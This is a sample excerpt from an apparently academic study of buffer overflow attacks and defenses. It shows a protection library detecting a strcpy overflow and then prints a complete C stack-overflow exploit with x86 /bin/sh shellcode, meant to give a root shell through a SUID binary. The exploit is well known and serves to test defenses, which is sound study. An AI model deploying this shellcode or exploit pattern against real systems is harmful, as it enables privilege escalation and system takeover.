
A Buffer Overflow Study - Attacks and Defenses

By Pierre-Alain, Vincent Glaume


Sample text

1 LD_PRELOAD

The first method is based on the LD_PRELOAD environment variable, and is used in the script you will find in the exploits directory.

    /t1
    This program tries to use strcpy() to overflow the buffer.
    If you get a /bin/sh prompt, then the exploit has worked.
    Press any key to continue...
    Detected an attempt to write across stack boundary.
    0-9/exploits/t1.
    uid=1000 euid=1000 pid=19982
    Call stack:
    0x40017504
    0x40017624
    0x804854c
    0x4004065a
    Overflow caused by strcpy()
    Killed

Of course it implies that it works only when a user sets this environment variable properly.

1 Exploits

We intend to see how our system behaves when it faces stack and heap overflows. We use simple exploits to perform these tests.

1 Stack overflow

We will use only one exploit to test stack attacks: stack1 is a program belonging to root, with a SUID bit, and provides a root shell. The shellcode is obtained by overflowing a local variable.

    #include <string.h>   /* strlen(), strcpy() */

    /* Code to execute: */
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    char large_string[128];

    int main(int argc, char *argv[]){
        char buffer[96]; /* buffer to overflow */
        int i;
        long *long_ptr = (long *)large_string;

        /* first loop: fill large_string with the address of buffer */
        for (i = 0; i < 32; i++)
            *(long_ptr + i) = (int)buffer;
        /* second loop: copy the shellcode to the start of large_string */
        for (i = 0; i < (int)strlen(shellcode); i++)
            large_string[i] = shellcode[i];
        /* unbounded copy of large_string into the 96-byte buffer */
        strcpy(buffer, large_string);
        return 0;
    }

How does it work?

In the second loop, the shellcode is copied into large_string. At this stage, large_string consists of shellcode + address of buffer. Then the vulnerable function strcpy is called. When main returns, the instructions in buffer will be executed, because the return address has been previously overwritten and now contains a pointer to buffer. The SUID bit and the root ownership of the binary are only a way to show how dangerous it may be; we mainly focus on the overflow here.

2 Heap overflow

Heap and malloc

The first program we will use to test heap overflow exploits (heap1) is based on the same principle as stack1 and provides a root shell too.
